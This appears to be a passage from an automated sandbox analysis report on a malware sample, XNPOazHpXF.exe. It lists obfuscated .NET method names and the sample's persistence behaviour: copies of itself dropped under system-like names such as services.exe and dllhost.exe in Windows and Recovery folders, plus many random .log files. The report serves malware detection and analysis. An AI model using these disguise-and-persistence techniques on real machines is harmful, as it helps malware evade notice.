                              Source: XNPOazHpXF.exe, JmTUPoSMkEvhXuPVBK4.csHigh entropy of concatenated method names: 'AHMSUcVtpV', 'fBISc2NoGE', '_7Bm', 'GR2SxI2H0W', 'KxTStXKXE6', 'oc0SAji1n4', 'yKtSeH15sV', 'S2aVg7uwwV7HMYl3UtQy', 'EF7hasuw9YCLXnVV7U9j', 'PgvA3Vuwl2Q5VnDaNG83'
                              Source: XNPOazHpXF.exe, cWOP3ke2ZEpghyEYkC7.csHigh entropy of concatenated method names: 'Yi3', 'CjmutYPwLn5', 'E4fe72SoSP', 'Oxfut7SC5cM', 'MlmXI3uoIakiKhnA4HD2', 'QGVbupuoPbY0cTa243Xx', 'jX8wF3uo64x28rb98CDX', 'jXCVYyuo4By7Q82RvXEY', 'fjnmLBuoKSs4wopgm2WG', 'EFV3d5uopnmJgNk3KFjg'
                              Source: XNPOazHpXF.exe, aKWHl9u8glSWo6xFrRJ.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'LlgutpXwSMw', 'a7auMsJJh6J', 'GPrrZ9ukCwq1PV6iPCXK', 'uAguaoukW9VSHIVxOYNU', 'a3y1sDuk6N19x8FdTPY1'
                              Source: XNPOazHpXF.exe, mAV4gCJBd9EijiTOH86.csHigh entropy of concatenated method names: 'uiEJGJ10Ia', 'kkBJkVYlbR', 'MrwJNTdvms', 'YSJJS7i662', 'raD1MAu1OIlYS4tbPTj7', 'z8wYHru1iWcoDn51naIi', 'ogdoTHu1Brx5PJQh6AQ9', 'tBfHB5u1GKR72bjRu5eN', 'in5s8Lu1kTHdnI0pnSx9', 'MIZnTYu1NObXmQoaFAvV'
                              Source: XNPOazHpXF.exe, pvjA4mEdTdWybuPtli9.csHigh entropy of concatenated method names: 'aj5E9S9dvp', 'VmvElvnBqq', 'GdWEwNQ8dJ', 'YThEHlRe0r', 'bavEsydxgf', 'a0OEFXjDdP', 'iqjEXh0rCT', 'TyyEENUDRN', 'OD6mOluybxUQuOkgy3FR', 'iiS8aRuyiPc9JAvqP45o'
                              Source: XNPOazHpXF.exe, VqJIGizs8nW6rnssr3.csHigh entropy of concatenated method names: 'WmnuubRmFj', 'sOquMNNUk5', 'SyouJKluHB', 'HdeuUlrGXR', 'AvkucULGwg', 'FMauxAWnm2', 'hcLuAvd4E1', 'qLBYjpuGNTRgnEyuJoxV', 'W8Smx9uGS9O2YVGk9gfS', 'LjL0wXuG16NyPqoPgy76'
                              Source: XNPOazHpXF.exe, kBq5vu1Glqvf7wywaol.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                              Source: XNPOazHpXF.exe, ppUNpg1vCX0en7ajHuu.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                              Source: XNPOazHpXF.exe, O6OtA1FDTm8tBW4JaaV.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'cnDFmHdVrS', 'dIwFrpcd2G', 'vKRFz53td2', '_0023Nn', 'Dispose', 'lvmPtguqE1UjCNeFoVde', 'S13hmFuqRC8JnkyBC0oI'
                              Source: XNPOazHpXF.exe, DU8VdduqJjvunykPTMy.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'bT5utgh5doV', 'a7auMsJJh6J', 'jfUMcOukBSPcokgvaI6l', 'PwexDSukOEPfF9qq4Kpc', 'l7u9JpukG22N5VanpaDM'
                              Source: XNPOazHpXF.exe, somSJxHFVTcCV6G1WGK.csHigh entropy of concatenated method names: 'vFUHEg8bec', 'b9AHRS3vov', 'wtwHqdVIti', 'tuwHDO1rYH', 'XpMHyeXG9g', 'FiaHmx3Wk9', 'AlrHruTv5t', 'fw9HzoeVyr', 'tQksvt17aA', 'hMGsu5a98j'
                              Source: XNPOazHpXF.exe, dRhjJFcxJScvnnQey8Y.csHigh entropy of concatenated method names: 'xIAcLqoigi', 'cN9cnb4OWT', 'JRCA14u2eGtYRCXHQLWR', 'mdYZEju2tL2bRAkdXgVp', 'aL0iaqu2AecNT4IQNEQj', 'ej05lKu2C9M9L91dLj34', 'q43cpXTQP8', 'HQNc0n6VFn', 'anPdJou2U7GoTAduRY0a', 'pcy6HSu2MtT9TuvgAkas'
                              Source: XNPOazHpXF.exe, PwLjORpE1pLHy7XhaBT.csHigh entropy of concatenated method names: 't99OnOudTFDf2WR7G9cH', 'nVBMrnudjodNCuPtwmRy', 'e6WxgCud8HwAvyPfvxSR', 'da95BEgnMW', 'BKfg23ud9wWtDUOAQgtk', 'Y6R8d6uddHRqY1y0dtFv', 'O7cbIbudZ8l7mdQ2Py2B', 'SMgwfSudlcyHWGjHWfyt', 'DUFMOvudwxaaKxtRdxW4', 'JaR5kQvaDu'
                              Source: XNPOazHpXF.exe, QQKGePCSqY5ByLrnRwj.csHigh entropy of concatenated method names: 'NOC6gxtYwO', 'CfRihwuflAk19aF1pYHM', 'rukaPfufZC2ZhUagZux9', 'hBR803uf94tEl3xoniaM', 'z0CHRMufwG0lBVSrftdk', 'aBUCQJWfiJ', 'bubC2FUyxt', 'YgLCYIyfZU', 'lXGC7piRC8', 'zuhCax1uD3'
                              Source: XNPOazHpXF.exe, jKlrWpSo8KVbt6RGIF0.csHigh entropy of concatenated method names: 'ivpSjVIKTY', 'l69S8lfQMQ', 'By2STOykdf', 'sD9SVS4L4r', 'RIISd7pu3a', 'ommE8vuHNS7m44fcGYHh', 'RlLavSuHSWTwSa4quwYV', 'MeZZlOuH1emcoXagJhjV', 'A7TGyFuHGop7tfDTnbDV', 'zYWc7suHkBxXYl2G3uig'
                              Source: XNPOazHpXF.exe, ITg14j4QAj5kFmm1PrK.csHigh entropy of concatenated method names: 'j9l', 'cve4YP5gC2', 'LyQ47kPQoO', 'bpc4aZOIYu', 'FqN4obT6X5', 'Dim4fjq1Lh', 'wLF4jMvgZo', 'hJPPH9ujOOFyZSp3pfJJ', 'one6KhujiDJTXvdikuiG', 'w6yyNRujBU2TX1vNwWEI'
                              Source: XNPOazHpXF.exe, LTuoPg1QDJZFvGByHbA.csHigh entropy of concatenated method names: 'J9p1YESaI9', 'Ur4172iSFb', 'FCW1aXOFfd', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'c3L1oC5UIn'
                              Source: XNPOazHpXF.exe, sjnv2lK5vXohJBiQSGl.csHigh entropy of concatenated method names: 'fYVK9m2Nsm', 'zleKinW4dq', 'NI6KBhhkIi', 'm8HKOTnCD2', 'GDcKGlyOus', 'IPWKkSj9K2', 'u77KNsL44t', 'HXeKSGeFma', 'mc6K1oSqOJ', 'tBfKQJX7Ov'
                              Source: XNPOazHpXF.exe, qqb6Wv5aaqkJPhVGlJs.csHigh entropy of concatenated method names: 'qcJGBgRHLR', 'jlVGODmrK6', 'EBRhAnu97rx3WPAiANgq', 'yGBfuxu92xP44SUGXfb9', 'Nc3umru9Ys5nAZmDZEEX', 'bLQ3wiu9aPXwDOK9axVG', 'XWiGW8u9ojtSdi6NIJ3Q', 'XxZGQOhv7E', 'zxthBfu9TDisOn401pcO', 'hkvIk4u9jA4DdZidhDfQ'
                              Source: XNPOazHpXF.exe, XDfetQkLmiJbWsW4vJo.csHigh entropy of concatenated method names: 'dkFk3ebiFQ', 'lXYk5lj6Hc', 'tAOkbV6SqP', 'kjWkiqF4uM', 'PaEkBAUnlu', 'DoqkOdEH3U', 't6TN2AulnWeerg8lC5O8', 'e6Tnrkul3U8TCxmR6QHM', 'vMp0M1ul5DhU5ga74ST4', 'HVkqYDulbPb5AeOsuZkl'
                              Source: XNPOazHpXF.exe, g3KZ4FkeNRCxr78yBI1.csHigh entropy of concatenated method names: 'BFckWKlDxW', 'D9Nk6VPtVm', 'VoIk4OT3Ul', 'pLOX2RultXi8MdGtDJqT', 'qhlispulARG59lXMEnAv', 'C2V4NZulewnY9Sh3FpUw', 'pwHTFxulCadxMDTiQv4i', 'cyCOwMulWgc6kY9ZbwA6'
                              Source: XNPOazHpXF.exe, npAJeQuOJLwgtBc7uje.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'wg8utPbxyNf', 'a7auMsJJh6J', 'k1EkNEuGR7NOcmT4RoN9', 'UxfFy5uGqt8iDXP9Gl4C', 'ywPP8nuGDqUX5dU9ZmoL'
                              Source: XNPOazHpXF.exe, KfJNDG1qjtyR9V7e4dv.csHigh entropy of concatenated method names: '_2JN', 'A67', '_49I', 'xDe1yPdkHE', 'KtK1mksCKm', 'x7y1rGuN4Q', 'e6f1zsYnNb', 'B34Qv6vUgD', 'wlZQuKHdRP', 'CFfsVCusiOyALS63cPq1'
                              Source: XNPOazHpXF.exe, QiVpXnPzoXh2XaQuXxr.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'GGtKuyqq97', 'VB2KhScgcH', 'gY2', 'rV4', '_28E'
                              Source: XNPOazHpXF.exe, P8jTZyU5jCpHxMlwO9n.csHigh entropy of concatenated method names: 'aLBU7eruMq', 'aBXUaZG94B', 'AeyQGAuQ19vxX4Z4O0p3', 'l0mFIpuQNXKvZxZFqgrj', 'D3OhxyuQSi3mejS9Apwg', 'WVi2q8uQQGywiu89D1qp', 'oFwUi0TS88', 'WxOUBUIECU', 'K6iUOQJNDx', 'ypfUGm6QPv'
                              Source: XNPOazHpXF.exe, zWen2AxR6cUytxgBSZM.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'MiXZdRuYoXV4ekQdDlie', 'O7NO8VuYf33RpGORvEHx', 'JhtwKQuYjFNXiZr6co79', 'rVsoGTuY8WCC8uWZ6Eqb'
                              Source: XNPOazHpXF.exe, h68va04XFIISwXuW4E8.csHigh entropy of concatenated method names: 'L2N4Rd8UX9', 'ltk4q0KVPa', 'k3a4Dm8pAS', 'qjk4yXBhlu', 'lWU4mHPjVL', 'gW3bWrujf4axjiF46pcl', 'KvLZsvuja6QrCENTE093', 'WCLvk5ujo29deD2UDFWO', 't0U5bBujjJM3PwnHBk7y', 'bgGAV3uj8ssWPn7skPgE'
                              Source: XNPOazHpXF.exe, CN7pujuw337O0SKbF7I.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'z0eut0QQ5Hi', 'a7auMsJJh6J', 'qCf1oVuk02eMTb6ve7Ne', 'BnXGdUukgF1u4LFAleKV', 'IGZghUukLLESFZB8Daj9'
                              Source: XNPOazHpXF.exe, eBVX6lu4qkbuE4rH3bM.csHigh entropy of concatenated method names: 'jlsuPXZqJp', 'tBVuKy3Zhr', 'DG2upqLC8P', 'lQMh7FuGTofVWPTStRrY', 'cn0kXruGjXO62QfbyY5f', 'hqI7MCuG8a5LBNbvqKYD', 'Ym9lb6uGV3QQf3y69Fqb', 'UAQxkuuGdVFnjHktf40h', 'waOEXhuGZW3CwymyUYSN'
                              Source: XNPOazHpXF.exe, GpuMceM7wY2o3r7VNnt.csHigh entropy of concatenated method names: 'rN3Mo5haQD', 'a0vMfcJyTL', 'oILMjE9NRM', 'w1FM8e28We', 'puUMTWwmgB', 'q7SMVBQVL5', 'Qn4Md07RMT', 't4FMZX3XVF', 'uHZM90jXxO', 'mXyMlKSBWX'
                              Source: XNPOazHpXF.exe, EAu4V4XJbfrNuu7e5LK.csHigh entropy of concatenated method names: 'lZeXctdjMc', 'L3hXxauH36', 'l2cXtvbTWr', 'B5HXAft4N6', '_0023Nn', 'Dispose', 'povPkLuqrgnw4JL8RtC7', 'LQVQEluqzvkt1gGr245w', 'zL5KyNuDvvGfYfurOEHs', 'KCCXH3uDuiZIjxEMGyos'
                              Source: XNPOazHpXF.exe, byX22ysFgR4f0H1dCVu.csHigh entropy of concatenated method names: 'YeQut9SXvUA', 'i07sEtl8ZI', 'xYasRFO5vP', 'K5nsqS6wgd', 'BMuwrQuRaEsZ4oB81nsP', 'vejH2VuRoPVYVGD9UTav', 'LQyeOOuRfpmkrtD1C8eR', 'nh0gpduRj0VWMcA8iBbU', 'cmI4UZuR8IRYCZoTAc79', 'yOJ8ZMuRT0OGpk6ynV3I'
                              Source: XNPOazHpXF.exe, mD4tJRCcba99AF6qVIS.csHigh entropy of concatenated method names: 'p5AsHYufPjxynNEjdDnw', 'yNGGPVufKxlSNcGlZNmM', 'wToeplufpsDpCntl1rUZ', 'Dt2iqVuf4si5ZdB2jFp4', 'xMmI82ufIm1G3nZyBHLX', '_7kT', '_376', 'CD6Cto88yS', 'zNjCAN363w', '_4p5'
                              Source: XNPOazHpXF.exe, eRiTeEFBW4c6MPUNRlp.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'sAAFG4V6wY', 'PYBVpAuq1HkwJhFA1MRT', 'dmHC5MuqQrc45ElqLD9S', 'hrFhD6uq2lo47Ox0ema8', 'Pex99FuqYmKLDfYfdobN', 'nPJJynuq7N0HyS9H8KB7', 'nHhiUauqagLx2BriEnih'

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files with benign system names
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Windows\InputMethod\CHT\services.exeJump to dropped file
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\InputMethod\CHT\services.exeJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exeJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Recovery\dllhost.exeJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\YwCJgfGU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\naXqXoBw.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\FsHliKMo.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\guqIJuAJ.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\MYoSwDMa.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\qeFoAUSY.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\hnCGlIml.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\rbhxVUhT.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\iSjOnjPm.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\XMTJgPHI.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\MpvkKZGd.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\BwIEkNWR.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\QOfJDANU.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\oXyytoQr.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\TuCjUNij.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\PWGsgpUk.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\HpleNtbG.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\hrRQfuPE.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\SRRrZjRP.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\McDcppqu.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\QgmbSWHW.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\wSNFrCZa.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\HhBLiJAA.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\olqGOXgZ.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\TEZjEzBg.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\udTfrDlO.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\WLWsZSvc.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\QKKBSDQi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\kdtxsFme.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\IzFuDcGk.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\UbnsZBxQ.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\kuAPHbgg.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\iosYAuez.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\lQBpXVWv.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\DujMFNlM.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\xLaDTRLB.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\wwvNdyqX.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\LozUEcuw.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\cEzSCxAQ.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\jkgzQrBD.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\dBbaXxPL.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\uMMNchrL.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Windows\InputMethod\CHT\services.exeJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\RdNjnWVR.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\JedTEJPv.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\EvgdMKxt.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\sGFWWBqe.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\fHiQeeRs.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\SVgCSVvi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\qWWWVlrS.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\KnJCpqCi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\dxMPeMlr.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\BKAMFwmA.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\piSOkXvU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\yGSOdQVY.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Windows\InputMethod\CHT\services.exeJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\UbnsZBxQ.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\SRRrZjRP.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\KnJCpqCi.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\BKAMFwmA.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\rbhxVUhT.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\qWWWVlrS.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\hnCGlIml.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\QgmbSWHW.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\FsHliKMo.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\olqGOXgZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\iSjOnjPm.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\QOfJDANU.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\qeFoAUSY.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\XMTJgPHI.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\MYoSwDMa.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\EvgdMKxt.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\uMMNchrL.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\kdtxsFme.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\fHiQeeRs.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\dxMPeMlr.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\MpvkKZGd.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\udTfrDlO.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\kuAPHbgg.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\RdNjnWVR.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\IzFuDcGk.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\xLaDTRLB.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile created: C:\Users\user\Desktop\piSOkXvU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\TuCjUNij.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\naXqXoBw.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\lQBpXVWv.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\TEZjEzBg.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\BwIEkNWR.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\jkgzQrBD.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\YwCJgfGU.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\HpleNtbG.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\yGSOdQVY.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\wwvNdyqX.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\oXyytoQr.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\guqIJuAJ.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\WLWsZSvc.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\McDcppqu.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\DujMFNlM.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\sGFWWBqe.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\cEzSCxAQ.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\SVgCSVvi.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\QKKBSDQi.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\HhBLiJAA.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\hrRQfuPE.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\wSNFrCZa.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\dBbaXxPL.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\LozUEcuw.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\JedTEJPv.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\iosYAuez.logJump to dropped file
                              Source: C:\Windows\InputMethod\CHT\services.exeFile created: C:\Users\user\Desktop\PWGsgpUk.logJump to dropped file
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
